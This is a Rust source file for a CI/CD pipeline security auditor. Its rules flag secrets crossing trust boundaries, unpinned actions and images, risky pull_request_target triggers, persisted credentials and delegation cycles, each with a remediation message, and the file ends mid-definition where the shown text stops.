Skip to main content

taudit_core/
rules.rs

1use crate::finding::{
2    Finding, FindingCategory, FindingExtras, FindingSource, Recommendation, Severity,
3};
4use crate::graph::{
5    is_docker_digest_pinned, is_pin_semantically_valid, AuthorityGraph, EdgeKind, IdentityScope,
6    NodeId, NodeKind, TrustZone, META_ADD_SPN_TO_ENV, META_ATTESTS, META_CACHE_KEY,
7    META_CHECKOUT_REF, META_CHECKOUT_SELF, META_CLI_FLAG_EXPOSED, META_CONTAINER, META_DIGEST,
8    META_DISPATCH_INPUTS, META_DOTENV_FILE, META_DOWNLOADS_ARTIFACT, META_ENVIRONMENT_NAME,
9    META_ENVIRONMENT_URL, META_ENV_APPROVAL, META_FORK_CHECK, META_GITLAB_ALLOW_FAILURE,
10    META_GITLAB_CACHE_KEY, META_GITLAB_CACHE_POLICY, META_GITLAB_DIND_SERVICE, META_GITLAB_EXTENDS,
11    META_GITLAB_INCLUDES, META_GITLAB_TRIGGER_KIND, META_IDENTITY_SCOPE, META_IMPLICIT,
12    META_INTERACTIVE_DEBUG, META_INTERPRETS_ARTIFACT, META_JOB_NAME, META_JOB_OUTPUTS, META_NEEDS,
13    META_NO_WORKFLOW_PERMISSIONS, META_OIDC, META_OIDC_AUDIENCE, META_PERMISSIONS, META_PLATFORM,
14    META_READS_ENV, META_REPOSITORIES, META_RULES_PROTECTED_ONLY, META_SCRIPT_BODY,
15    META_SECRETS_INHERIT, META_SELF_HOSTED, META_SERVICE_CONNECTION, META_SERVICE_CONNECTION_NAME,
16    META_TERRAFORM_AUTO_APPROVE, META_TRIGGER, META_TRIGGERS, META_VARIABLE_GROUP,
17    META_WORKSPACE_CLEAN, META_WRITES_ENV_GATE,
18};
19use crate::propagation;
20
21/// MVP Rule 1: Authority (secret/identity) propagated across a trust boundary.
22///
23/// **Clustering (v0.9.x):** all paths from the same root authority node
24/// (Secret/Identity) collapse into ONE finding per source. The single
25/// finding carries every reached sink in `nodes_involved` — `[source,
26/// sink_a, sink_b, ...]` — and lists them in the message. This matches
27/// the SARIF fingerprint behaviour (which already collapses per
28/// `root_authority_node_name`) and removes the alert-fatigue cliff seen
29/// on the GHA corpus where one `GITHUB_TOKEN` could produce 8+ near-
30/// identical findings as it propagated through a matrix workflow.
31///
32/// Severity graduation (per-path, then max-over-paths):
33/// - Untrusted sink: Critical (real risk — unpinned code with authority)
34/// - SHA-pinned ThirdParty sink: High (immutable code, but still cross-boundary)
35/// - SHA-pinned sink + constrained identity: Medium (lowest-risk form — read-only
36///   token to immutable third-party code, e.g. `contents:read` → `actions/checkout@sha`)
37///
38/// When every path in a cluster crosses an environment approval gate,
39/// the cluster's severity is downgraded one step (mirroring the
40/// per-path downgrade the previous emitter applied).
41pub fn authority_propagation(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
42    let paths = propagation::propagation_analysis(graph, max_hops);
43
44    // Group by root authority source node. We preserve insertion order so
45    // findings come out in the same order they would have under per-hop
46    // emission (callers and golden-file tests rely on the source-first
47    // ordering of authority_propagation findings).
48    let mut order: Vec<NodeId> = Vec::new();
49    let mut groups: std::collections::HashMap<NodeId, Vec<propagation::PropagationPath>> =
50        std::collections::HashMap::new();
51
52    for path in paths.into_iter().filter(|p| p.crossed_boundary) {
53        groups
54            .entry(path.source)
55            .or_insert_with(|| {
56                order.push(path.source);
57                Vec::new()
58            })
59            .push(path);
60    }
61
62    let mut findings = Vec::with_capacity(order.len());
63
64    for source_id in order {
65        let paths = match groups.remove(&source_id) {
66            Some(p) if !p.is_empty() => p,
67            _ => continue,
68        };
69
70        let source_name = graph
71            .node(source_id)
72            .map(|n| n.name.as_str())
73            .unwrap_or("?")
74            .to_string();
75        let source_is_constrained = graph
76            .node(source_id)
77            .and_then(|n| n.metadata.get(META_IDENTITY_SCOPE))
78            .map(|s| s == "constrained")
79            .unwrap_or(false);
80        let source_is_oidc = graph
81            .node(source_id)
82            .and_then(|n| n.metadata.get(META_OIDC))
83            .map(|v| v == "true")
84            .unwrap_or(false);
85
86        // Walk every path in the cluster and compute (severity, gated?,
87        // sink id, representative path) — the cluster takes the max
88        // severity (i.e. the worst sink wins). Severity is downgraded
89        // only when every path in the cluster crosses an env-approval
90        // gate; if even one path bypasses the gate, the cluster is not
91        // downgraded.
92        let mut worst_sev = Severity::Info;
93        let mut all_gated = true;
94        let mut best_path: Option<propagation::PropagationPath> = None;
95        let mut sink_ids: Vec<NodeId> = Vec::new();
96        let mut seen_sinks = std::collections::HashSet::new();
97
98        for path in &paths {
99            let sink_is_pinned = graph
100                .node(path.sink)
101                .map(|n| {
102                    n.trust_zone == TrustZone::ThirdParty && n.metadata.contains_key(META_DIGEST)
103                })
104                .unwrap_or(false);
105
106            let base_severity = if sink_is_pinned && source_is_constrained && !source_is_oidc {
107                Severity::Medium
108            } else if sink_is_pinned && !source_is_oidc {
109                Severity::High
110            } else {
111                Severity::Critical
112            };
113
114            let gated = path_crosses_env_approval(graph, path);
115            let effective_severity = if gated {
116                downgrade_one_step(base_severity)
117            } else {
118                base_severity
119            };
120
121            if !gated {
122                all_gated = false;
123            }
124
125            if effective_severity < worst_sev {
126                worst_sev = effective_severity;
127                best_path = Some(path.clone());
128            }
129
130            if seen_sinks.insert(path.sink) {
131                sink_ids.push(path.sink);
132            }
133        }
134
135        // Build sink name list for the message. Truncate aggressively past
136        // ~5 names to avoid an unbounded message string on extreme inputs;
137        // the full set is still in `nodes_involved`.
138        let mut sink_names: Vec<String> = sink_ids
139            .iter()
140            .filter_map(|id| graph.node(*id).map(|n| n.name.clone()))
141            .collect();
142        let truncated = if sink_names.len() > 5 {
143            let extra = sink_names.len() - 5;
144            sink_names.truncate(5);
145            format!(", …+{extra} more")
146        } else {
147            String::new()
148        };
149        let sink_list = sink_names.join(", ");
150
151        let suffix = if all_gated && !paths.is_empty() {
152            " (mitigated: environment approval gate)"
153        } else {
154            ""
155        };
156
157        let mut nodes_involved = Vec::with_capacity(sink_ids.len() + 1);
158        nodes_involved.push(source_id);
159        nodes_involved.extend(sink_ids.iter().copied());
160
161        let n = paths.len();
162        let unique_sinks = sink_ids.len();
163        let message = if unique_sinks == 1 {
164            format!("{source_name} propagated to {sink_list} across trust boundary{suffix}")
165        } else {
166            format!(
167                "{source_name} reaches {unique_sinks} sinks via authority propagation: [{sink_list}{truncated}]{suffix}"
168            )
169        };
170
171        let _ = n; // path count retained in the cluster's `path` field; not surfaced separately
172
173        findings.push(Finding {
174            severity: worst_sev,
175            category: FindingCategory::AuthorityPropagation,
176            nodes_involved,
177            message,
178            recommendation: Recommendation::TsafeRemediation {
179                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
180                explanation: format!("Scope {source_name} to only the steps that need it"),
181            },
182            path: best_path,
183            source: FindingSource::BuiltIn,
184            extras: FindingExtras::default(),
185        });
186    }
187
188    findings
189}
190
191/// Returns true if any node touched by `path` (source, sink, or any edge
192/// endpoint along the way) carries META_ENV_APPROVAL = "true".
193fn path_crosses_env_approval(graph: &AuthorityGraph, path: &propagation::PropagationPath) -> bool {
194    let has_marker = |id: NodeId| {
195        graph
196            .node(id)
197            .and_then(|n| n.metadata.get(META_ENV_APPROVAL))
198            .map(|v| v == "true")
199            .unwrap_or(false)
200    };
201
202    if has_marker(path.source) || has_marker(path.sink) {
203        return true;
204    }
205
206    for &edge_id in &path.edges {
207        if let Some(edge) = graph.edge(edge_id) {
208            if has_marker(edge.from) || has_marker(edge.to) {
209                return true;
210            }
211        }
212    }
213    false
214}
215
216/// Reduce a severity by one step. Critical→High, High→Medium, Medium→Low.
217/// Low and Info are already at the floor of meaningful reduction and are
218/// returned unchanged.
219fn downgrade_one_step(severity: Severity) -> Severity {
220    match severity {
221        Severity::Critical => Severity::High,
222        Severity::High => Severity::Medium,
223        Severity::Medium => Severity::Low,
224        Severity::Low => Severity::Low,
225        Severity::Info => Severity::Info,
226    }
227}
228
229/// MVP Rule 2: Identity scope broader than actual usage.
230///
231/// Uses `IdentityScope` classification from the precision layer. Broad and
232/// Unknown scopes are flagged — Unknown is treated as risky because if we
233/// can't determine the scope, we shouldn't assume it's safe.
234pub fn over_privileged_identity(graph: &AuthorityGraph) -> Vec<Finding> {
235    let mut findings = Vec::new();
236
237    for identity in graph.nodes_of_kind(NodeKind::Identity) {
238        let granted_scope = identity
239            .metadata
240            .get(META_PERMISSIONS)
241            .cloned()
242            .unwrap_or_default();
243
244        // Use IdentityScope from metadata if set by parser, otherwise classify from permissions
245        let scope = identity
246            .metadata
247            .get(META_IDENTITY_SCOPE)
248            .and_then(|s| match s.as_str() {
249                "broad" => Some(IdentityScope::Broad),
250                "constrained" => Some(IdentityScope::Constrained),
251                "unknown" => Some(IdentityScope::Unknown),
252                _ => None,
253            })
254            .unwrap_or_else(|| IdentityScope::from_permissions(&granted_scope));
255
256        // Broad or Unknown scope — flag it. Unknown is treated as risky.
257        let (should_flag, severity) = match scope {
258            IdentityScope::Broad => (true, Severity::High),
259            IdentityScope::Unknown => (true, Severity::Medium),
260            IdentityScope::Constrained => (false, Severity::Info),
261        };
262
263        if !should_flag {
264            continue;
265        }
266
267        let accessor_steps: Vec<_> = graph
268            .edges_to(identity.id)
269            .filter(|e| e.kind == EdgeKind::HasAccessTo)
270            .filter_map(|e| graph.node(e.from))
271            .collect();
272
273        if !accessor_steps.is_empty() {
274            let scope_label = match scope {
275                IdentityScope::Broad => "broad",
276                IdentityScope::Unknown => "unknown (treat as risky)",
277                IdentityScope::Constrained => "constrained",
278            };
279
280            findings.push(Finding {
281                severity,
282                category: FindingCategory::OverPrivilegedIdentity,
283                path: None,
284                nodes_involved: std::iter::once(identity.id)
285                    .chain(accessor_steps.iter().map(|n| n.id))
286                    .collect(),
287                message: format!(
288                    "{} has {} scope (permissions: '{}') — likely broader than needed",
289                    identity.name, scope_label, granted_scope
290                ),
291                recommendation: Recommendation::ReducePermissions {
292                    current: granted_scope.clone(),
293                    minimum: "{ contents: read }".into(),
294                },
295                source: FindingSource::BuiltIn,
296                // Working out the minimum-needed scope across N jobs is a
297                // ~1 hour audit, not a flag flip — Small.
298                extras: FindingExtras {
299                    time_to_fix: Some(crate::finding::FixEffort::Small),
300                    ..FindingExtras::default()
301                },
302            });
303        }
304    }
305
306    findings
307}
308
309/// MVP Rule 3: Third-party action/image without SHA pin.
310///
311/// **Severity tiering (v0.9.x):** the rule used to fire at a single severity
312/// regardless of which action was unpinned, which produced uniform noise on
313/// monorepo CI files where the action owner determined the actual risk.
314/// The blue-team corpus report (`MEMORY/.../blueteam-corpus-defense.md`)
315/// recommended splitting:
316///   * Same-repo composite action (`./.github/actions/*`) → **Info**.
317///     The action lives in the consumer's own repo — there's no external
318///     supply-chain surface; pinning is a hygiene preference, not a
319///     control gap.
320///   * Owner is a well-known first-party org (`actions/*`, `github/*`,
321///     `actions-rs/*`, `docker/*`) → **Medium**. These are GitHub-org or
322///     adjacent tooling maintainers; the supply-chain surface exists but
323///     is operationally narrow and well-monitored.
324///   * Anything else (`random-org/foo@v1`, etc.) → **High**. Unbounded
325///     supply-chain risk — this is the case the rule was originally
326///     designed for.
327///
328/// Deduplicates by action reference — the same action used in multiple jobs
329/// produces multiple Image nodes but should only be flagged once.
330pub fn unpinned_action(graph: &AuthorityGraph) -> Vec<Finding> {
331    let mut findings = Vec::new();
332    let mut seen = std::collections::HashSet::new();
333
334    for image in graph.nodes_of_kind(NodeKind::Image) {
335        // Container images are handled by floating_image — skip here to avoid
336        // double-flagging the same node as both UnpinnedAction and FloatingImage.
337        if image
338            .metadata
339            .get(META_CONTAINER)
340            .map(|v| v == "true")
341            .unwrap_or(false)
342        {
343            continue;
344        }
345
346        // Self-hosted runner labels live in the FirstParty zone but aren't
347        // an action reference — they have no `@version` to pin and the rule
348        // would otherwise flag every `runs-on: self-hosted` line.
349        if image
350            .metadata
351            .get(META_SELF_HOSTED)
352            .map(|v| v == "true")
353            .unwrap_or(false)
354        {
355            continue;
356        }
357
358        // Same-repo composite actions (`./.github/actions/foo`) sit in the
359        // FirstParty zone. Other FirstParty Image nodes (e.g. self-hosted
360        // pool labels, hosted runner names) are not flaggable references —
361        // we admit FirstParty into the severity ladder ONLY when the name
362        // is the relative-path form, and emit Info for it.
363        let is_local_composite = image.name.starts_with("./");
364        if image.trust_zone == TrustZone::FirstParty && !is_local_composite {
365            continue;
366        }
367
368        // Deduplicate: same action reference flagged once
369        if !seen.insert(&image.name) {
370            continue;
371        }
372
373        let has_digest = image.metadata.contains_key(META_DIGEST);
374
375        if has_digest || is_pin_semantically_valid(&image.name) {
376            continue;
377        }
378
379        // Tier severity by owner. `is_local_composite` already handled the
380        // same-repo case; for everything else, look at the `<owner>/...`
381        // prefix and decide first-party vs unknown supplier.
382        let severity = if is_local_composite {
383            Severity::Info
384        } else if is_well_known_first_party_action(&image.name) {
385            Severity::Medium
386        } else {
387            Severity::High
388        };
389
390        findings.push(Finding {
391            severity,
392            category: FindingCategory::UnpinnedAction,
393            path: None,
394            nodes_involved: vec![image.id],
395            message: format!("{} is not pinned to a SHA digest", image.name),
396            recommendation: Recommendation::PinAction {
397                current: image.name.clone(),
398                pinned: format!(
399                    "{}@<sha256-digest>",
400                    image.name.split('@').next().unwrap_or(&image.name)
401                ),
402            },
403            source: FindingSource::BuiltIn,
404            // Mechanical fix: replace `@v3` with `@<40-char-sha>`. ~5 min.
405            extras: FindingExtras {
406                time_to_fix: Some(crate::finding::FixEffort::Trivial),
407                ..FindingExtras::default()
408            },
409        });
410    }
411
412    findings
413}
414
/// Tells whether the owner segment of a `uses:` reference is one of the
/// orgs treated as well-known first-party for severity tiering.
///
/// The allow-list is deliberately short and conservative: every org on it
/// has all of its unpinned actions downgraded, so the bar is
/// "GitHub-maintained or directly adjacent core tooling". The comparison
/// is exact (case-sensitive); anything not listed keeps the High default.
fn is_well_known_first_party_action(uses: &str) -> bool {
    const TRUSTED_OWNERS: [&str; 4] = ["actions", "github", "actions-rs", "docker"];

    // Drop an optional `@<ref>` suffix, then keep what precedes the first `/`.
    let without_ref = uses.split_once('@').map_or(uses, |(head, _)| head);
    let owner = without_ref
        .split_once('/')
        .map_or(without_ref, |(head, _)| head);

    TRUSTED_OWNERS.contains(&owner)
}
426
427/// MVP Rule 4: Untrusted step has direct access to secret/identity.
428pub fn untrusted_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
429    let mut findings = Vec::new();
430
431    for step in graph.nodes_in_zone(TrustZone::Untrusted) {
432        if step.kind != NodeKind::Step {
433            continue;
434        }
435
436        // Check if this untrusted step directly accesses any authority source
437        for edge in graph.edges_from(step.id) {
438            if edge.kind != EdgeKind::HasAccessTo {
439                continue;
440            }
441
442            if let Some(target) = graph.node(edge.to) {
443                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
444                    let cli_flag_exposed = target
445                        .metadata
446                        .get(META_CLI_FLAG_EXPOSED)
447                        .map(|v| v == "true")
448                        .unwrap_or(false);
449
450                    // Platform-implicit tokens (e.g. ADO System.AccessToken) are structurally
451                    // accessible to all tasks by design. Flag at Info — real but not actionable
452                    // as a misconfiguration. Explicit secrets/service connections stay Critical.
453                    let is_implicit = target
454                        .metadata
455                        .get(META_IMPLICIT)
456                        .map(|v| v == "true")
457                        .unwrap_or(false);
458
459                    let recommendation = if target.kind == NodeKind::Secret {
460                        if cli_flag_exposed {
461                            Recommendation::Manual {
462                                action: format!(
463                                    "Move '{}' from -var flag to TF_VAR_{} env var — \
464                                     -var values appear in pipeline logs and Terraform plan output",
465                                    target.name, target.name
466                                ),
467                            }
468                        } else {
469                            Recommendation::CellosRemediation {
470                                reason: format!(
471                                    "Untrusted step '{}' has direct access to secret '{}'",
472                                    step.name, target.name
473                                ),
474                                spec_hint: format!(
475                                    "cellos run --network deny-all --broker env:{}",
476                                    target.name
477                                ),
478                            }
479                        }
480                    } else {
481                        // Identity branch — for implicit platform tokens, add a CellOS
482                        // compensating-control note since the token cannot be un-injected
483                        // at the platform layer.
484                        let minimum = if is_implicit {
485                            "minimal required scope — or use CellOS deny-all egress as a compensating control to limit exfiltration of the injected token".into()
486                        } else {
487                            "minimal required scope".into()
488                        };
489                        Recommendation::ReducePermissions {
490                            current: target
491                                .metadata
492                                .get(META_PERMISSIONS)
493                                .cloned()
494                                .unwrap_or_else(|| "unknown".into()),
495                            minimum,
496                        }
497                    };
498
499                    let log_exposure_note = if cli_flag_exposed {
500                        " (passed as -var flag — value visible in pipeline logs)"
501                    } else {
502                        ""
503                    };
504
505                    let (severity, message) =
506                        if is_implicit {
507                            (
508                                Severity::Info,
509                                format!(
510                                "Untrusted step '{}' has structural access to implicit {} '{}' \
511                                 (platform-injected — all tasks receive this token by design){}",
512                                step.name,
513                                if target.kind == NodeKind::Secret { "secret" } else { "identity" },
514                                target.name,
515                                log_exposure_note,
516                            ),
517                            )
518                        } else {
519                            (
520                                Severity::Critical,
521                                format!(
522                                    "Untrusted step '{}' has direct access to {} '{}'{}",
523                                    step.name,
524                                    if target.kind == NodeKind::Secret {
525                                        "secret"
526                                    } else {
527                                        "identity"
528                                    },
529                                    target.name,
530                                    log_exposure_note,
531                                ),
532                            )
533                        };
534
535                    findings.push(Finding {
536                        severity,
537                        category: FindingCategory::UntrustedWithAuthority,
538                        path: None,
539                        nodes_involved: vec![step.id, target.id],
540                        message,
541                        recommendation,
542                        source: FindingSource::BuiltIn,
543                        extras: FindingExtras::default(),
544                    });
545                }
546            }
547        }
548    }
549
550    findings
551}
552
553/// MVP Rule 5: Artifact produced by privileged step consumed across trust boundary.
554pub fn artifact_boundary_crossing(graph: &AuthorityGraph) -> Vec<Finding> {
555    let mut findings = Vec::new();
556
557    for artifact in graph.nodes_of_kind(NodeKind::Artifact) {
558        // Find producer(s)
559        let producers: Vec<_> = graph
560            .edges_to(artifact.id)
561            .filter(|e| e.kind == EdgeKind::Produces)
562            .filter_map(|e| graph.node(e.from))
563            .collect();
564
565        // Find consumer(s) — Consumes edges go artifact -> step
566        let consumers: Vec<_> = graph
567            .edges_from(artifact.id)
568            .filter(|e| e.kind == EdgeKind::Consumes)
569            .filter_map(|e| graph.node(e.to))
570            .collect();
571
572        for producer in &producers {
573            for consumer in &consumers {
574                // Skip intra-job pairs: upload → download within the same job
575                // is a legitimate temp-file pattern. The trust crossing is only
576                // meaningful when the artifact crosses a job boundary.
577                let prod_job = producer
578                    .metadata
579                    .get(META_JOB_NAME)
580                    .map(String::as_str)
581                    .unwrap_or("");
582                let cons_job = consumer
583                    .metadata
584                    .get(META_JOB_NAME)
585                    .map(String::as_str)
586                    .unwrap_or("");
587                if !prod_job.is_empty() && prod_job == cons_job {
588                    continue;
589                }
590
591                if producer.trust_zone.is_lower_than(&consumer.trust_zone) {
592                    findings.push(Finding {
593                        severity: Severity::High,
594                        category: FindingCategory::ArtifactBoundaryCrossing,
595                        path: None,
596                        nodes_involved: vec![producer.id, artifact.id, consumer.id],
597                        message: format!(
598                            "Untrusted artifact '{}' produced by '{}' ({:?}) consumed by privileged step '{}' ({:?})",
599                            artifact.name,
600                            producer.name,
601                            producer.trust_zone,
602                            consumer.name,
603                            consumer.trust_zone
604                        ),
605                        recommendation: Recommendation::Manual {
606                            action: "Ensure the artifact producer runs in a trusted job; restrict which jobs can consume the artifact using platform-specific controls (e.g. environment protection rules, manual approval gates).".into(),
607                        },
608                        source: FindingSource::BuiltIn,
609                        extras: FindingExtras::default(),
610                    });
611                }
612            }
613        }
614    }
615
616    findings
617}
618
619/// Stretch Rule 9: Secret name matches known long-lived/static credential pattern.
620///
621/// Heuristic: secrets named like AWS keys, API keys, passwords, or private keys
622/// are likely static credentials that should be replaced with OIDC federation.
623pub fn long_lived_credential(graph: &AuthorityGraph) -> Vec<Finding> {
624    const STATIC_PATTERNS: &[&str] = &[
625        "AWS_ACCESS_KEY",
626        "AWS_SECRET_ACCESS_KEY",
627        "_API_KEY",
628        "_APIKEY",
629        "_PASSWORD",
630        "_PASSWD",
631        "_PRIVATE_KEY",
632        "_SECRET_KEY",
633        "_SERVICE_ACCOUNT",
634        "_SIGNING_KEY",
635    ];
636
637    let mut findings = Vec::new();
638
639    for secret in graph.nodes_of_kind(NodeKind::Secret) {
640        let upper = secret.name.to_uppercase();
641        let is_static = STATIC_PATTERNS.iter().any(|p| upper.contains(p));
642
643        if is_static {
644            findings.push(Finding {
645                severity: Severity::Low,
646                category: FindingCategory::LongLivedCredential,
647                path: None,
648                nodes_involved: vec![secret.id],
649                message: format!(
650                    "'{}' looks like a long-lived static credential",
651                    secret.name
652                ),
653                recommendation: Recommendation::FederateIdentity {
654                    static_secret: secret.name.clone(),
655                    oidc_provider: "GitHub Actions OIDC (id-token: write)".into(),
656                },
657                source: FindingSource::BuiltIn,
658                // Migrating from PATs to OIDC across an org touches identity
659                // policy, IAM trust relationships, and every downstream
660                // consumer of the credential — Large effort.
661                extras: FindingExtras {
662                    time_to_fix: Some(crate::finding::FixEffort::Large),
663                    ..FindingExtras::default()
664                },
665            });
666        }
667    }
668
669    findings
670}
671
672/// Tier 6 Rule: Container image without Docker digest pinning.
673///
674/// Job-level containers marked with `META_CONTAINER` that aren't pinned to
675/// `image@sha256:<64hex>` can be silently mutated between runs. Deduplicates
676/// by image name (same image in multiple jobs flags once).
677pub fn floating_image(graph: &AuthorityGraph) -> Vec<Finding> {
678    let mut findings = Vec::new();
679    let mut seen = std::collections::HashSet::new();
680
681    for image in graph.nodes_of_kind(NodeKind::Image) {
682        let is_container = image
683            .metadata
684            .get(META_CONTAINER)
685            .map(|v| v == "true")
686            .unwrap_or(false);
687
688        if !is_container {
689            continue;
690        }
691
692        if !seen.insert(image.name.as_str()) {
693            continue;
694        }
695
696        if !is_docker_digest_pinned(&image.name) {
697            findings.push(Finding {
698                severity: Severity::Medium,
699                category: FindingCategory::FloatingImage,
700                path: None,
701                nodes_involved: vec![image.id],
702                message: format!("Container image '{}' is not pinned to a digest", image.name),
703                recommendation: Recommendation::PinAction {
704                    current: image.name.clone(),
705                    pinned: format!(
706                        "{}@sha256:<digest>",
707                        image.name.split(':').next().unwrap_or(&image.name)
708                    ),
709                },
710                source: FindingSource::BuiltIn,
711                // `docker pull <image>` once and append `@sha256:<digest>` —
712                // identical mechanical fix to unpinned_action. Trivial.
713                extras: FindingExtras {
714                    time_to_fix: Some(crate::finding::FixEffort::Trivial),
715                    ..FindingExtras::default()
716                },
717            });
718        }
719    }
720
721    findings
722}
723
724/// Stretch Rule: checkout step with `persistCredentials: true` writes credentials to disk.
725///
726/// The PersistsTo edge connects a checkout step to the token it persists. Disk-resident
727/// credentials are accessible to all subsequent steps (and to any process with filesystem
728/// access), unlike runtime-only HasAccessTo authority which expires when the step exits.
729pub fn persisted_credential(graph: &AuthorityGraph) -> Vec<Finding> {
730    let mut findings = Vec::new();
731
732    for edge in &graph.edges {
733        if edge.kind != EdgeKind::PersistsTo {
734            continue;
735        }
736
737        let Some(step) = graph.node(edge.from) else {
738            continue;
739        };
740        let Some(target) = graph.node(edge.to) else {
741            continue;
742        };
743
744        findings.push(Finding {
745            severity: Severity::High,
746            category: FindingCategory::PersistedCredential,
747            path: None,
748            nodes_involved: vec![step.id, target.id],
749            message: format!(
750                "'{}' persists '{}' to disk via persistCredentials: true — \
751                 credential remains in .git/config and is accessible to all subsequent steps",
752                step.name, target.name
753            ),
754            recommendation: Recommendation::Manual {
755                action: "Remove persistCredentials: true from the checkout step. \
756                         Pass credentials explicitly only to steps that need them."
757                    .into(),
758            },
759            source: FindingSource::BuiltIn,
760            extras: FindingExtras::default(),
761        });
762    }
763
764    findings
765}
766
767/// Rule: dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
768///
769/// Fires once per workflow when the graph-level `META_TRIGGER` indicates a high-risk
770/// trigger and at least one step holds authority. Aggregates all involved nodes.
771pub fn trigger_context_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
772    let trigger = match graph.metadata.get(META_TRIGGER) {
773        Some(t) => t.clone(),
774        None => return Vec::new(),
775    };
776
777    let severity = match trigger.as_str() {
778        "pull_request_target" => Severity::Critical,
779        "pr" => Severity::High,
780        _ => return Vec::new(),
781    };
782
783    // Collect steps that hold authority (HasAccessTo a Secret or Identity)
784    let mut steps_with_authority: Vec<NodeId> = Vec::new();
785    let mut authority_targets: Vec<NodeId> = Vec::new();
786
787    for step in graph.nodes_of_kind(NodeKind::Step) {
788        let mut step_holds_authority = false;
789        for edge in graph.edges_from(step.id) {
790            if edge.kind != EdgeKind::HasAccessTo {
791                continue;
792            }
793            if let Some(target) = graph.node(edge.to) {
794                if matches!(target.kind, NodeKind::Secret | NodeKind::Identity) {
795                    step_holds_authority = true;
796                    if !authority_targets.contains(&target.id) {
797                        authority_targets.push(target.id);
798                    }
799                }
800            }
801        }
802        if step_holds_authority {
803            steps_with_authority.push(step.id);
804        }
805    }
806
807    if steps_with_authority.is_empty() {
808        return Vec::new();
809    }
810
811    let n = steps_with_authority.len();
812    let mut nodes_involved = steps_with_authority.clone();
813    nodes_involved.extend(authority_targets);
814
815    vec![Finding {
816        severity,
817        category: FindingCategory::TriggerContextMismatch,
818        path: None,
819        nodes_involved,
820        message: format!(
821            "Workflow triggered by {trigger} with secret/identity access — {n} step(s) hold authority that attacker-controlled code could reach"
822        ),
823        recommendation: Recommendation::Manual {
824            action: "Use a separate workflow triggered by workflow_run (not pull_request_target) for privileged operations, or ensure no checkout of the PR head ref occurs before secret use".into(),
825        },
826        source: FindingSource::BuiltIn,
827        extras: FindingExtras::default(),
828}]
829}
830
831/// Rule: authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
832///
833/// For each Step node: find all `DelegatesTo` edges to Image nodes where the trust zone
834/// is not FirstParty. If the same step also has `HasAccessTo` any Secret or Identity,
835/// emit one finding per delegation edge.
836pub fn cross_workflow_authority_chain(graph: &AuthorityGraph) -> Vec<Finding> {
837    let mut findings = Vec::new();
838
839    for step in graph.nodes_of_kind(NodeKind::Step) {
840        // Collect authority sources this step holds
841        let authority_nodes: Vec<&_> = graph
842            .edges_from(step.id)
843            .filter(|e| e.kind == EdgeKind::HasAccessTo)
844            .filter_map(|e| graph.node(e.to))
845            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
846            .collect();
847
848        if authority_nodes.is_empty() {
849            continue;
850        }
851
852        // Find each DelegatesTo edge to a non-FirstParty Image
853        for edge in graph.edges_from(step.id) {
854            if edge.kind != EdgeKind::DelegatesTo {
855                continue;
856            }
857            let Some(target) = graph.node(edge.to) else {
858                continue;
859            };
860            if target.kind != NodeKind::Image {
861                continue;
862            }
863            if target.trust_zone == TrustZone::FirstParty {
864                continue;
865            }
866
867            let severity = match target.trust_zone {
868                TrustZone::Untrusted => Severity::Critical,
869                TrustZone::ThirdParty => Severity::High,
870                TrustZone::FirstParty => continue,
871            };
872
873            let authority_names: Vec<String> =
874                authority_nodes.iter().map(|n| n.name.clone()).collect();
875            let authority_label = authority_names.join(", ");
876
877            let mut nodes_involved = vec![step.id, target.id];
878            nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
879
880            findings.push(Finding {
881                severity,
882                category: FindingCategory::CrossWorkflowAuthorityChain,
883                path: None,
884                nodes_involved,
885                message: format!(
886                    "'{}' delegates to '{}' ({:?}) while holding authority ({}) — authority chain extends into opaque external workflow",
887                    step.name, target.name, target.trust_zone, authority_label
888                ),
889                recommendation: Recommendation::Manual {
890                    action: format!(
891                        "Pin '{}' to a full SHA digest; audit what authority the called workflow receives",
892                        target.name
893                    ),
894                },
895                source: FindingSource::BuiltIn,
896                        extras: FindingExtras::default(),
897});
898        }
899    }
900
901    findings
902}
903
904/// Rule: circular DelegatesTo chain — workflow calls itself transitively.
905///
906/// Iterative DFS over `DelegatesTo` edges. Detects back edges (gray → gray) and
907/// collects all nodes that participate in any cycle. If any cycles exist, emits
908/// a single High-severity finding listing all cycle members.
909pub fn authority_cycle(graph: &AuthorityGraph) -> Vec<Finding> {
910    let n = graph.nodes.len();
911    if n == 0 {
912        return Vec::new();
913    }
914
915    // Pre-build adjacency list for DelegatesTo edges only.
916    let mut delegates_to: Vec<Vec<NodeId>> = vec![Vec::new(); n];
917    for edge in &graph.edges {
918        if edge.kind == EdgeKind::DelegatesTo && edge.from < n && edge.to < n {
919            delegates_to[edge.from].push(edge.to);
920        }
921    }
922
923    let mut color: Vec<u8> = vec![0u8; n]; // 0=white, 1=gray, 2=black
924    let mut cycle_nodes: std::collections::BTreeSet<NodeId> = std::collections::BTreeSet::new();
925
926    for start in 0..n {
927        if color[start] != 0 {
928            continue;
929        }
930        color[start] = 1;
931        let mut stack: Vec<(NodeId, usize)> = vec![(start, 0)];
932
933        loop {
934            let len = stack.len();
935            if len == 0 {
936                break;
937            }
938            let (node_id, edge_idx) = stack[len - 1];
939            if edge_idx < delegates_to[node_id].len() {
940                stack[len - 1].1 += 1;
941                let neighbor = delegates_to[node_id][edge_idx];
942                if color[neighbor] == 1 {
943                    // Back edge: cycle found. Collect every node between `neighbor`
944                    // (the cycle start) and `node_id` (the cycle end) along the
945                    // current DFS stack. All stack entries are gray by construction,
946                    // so we walk the stack from `neighbor` to the top.
947                    let cycle_start_idx =
948                        stack.iter().position(|&(n, _)| n == neighbor).unwrap_or(0);
949                    for &(n, _) in &stack[cycle_start_idx..] {
950                        cycle_nodes.insert(n);
951                    }
952                } else if color[neighbor] == 0 {
953                    color[neighbor] = 1;
954                    stack.push((neighbor, 0));
955                }
956            } else {
957                color[node_id] = 2;
958                stack.pop();
959            }
960        }
961    }
962
963    if cycle_nodes.is_empty() {
964        return Vec::new();
965    }
966
967    vec![Finding {
968        severity: Severity::High,
969        category: FindingCategory::AuthorityCycle,
970        path: None,
971        nodes_involved: cycle_nodes.into_iter().collect(),
972        message:
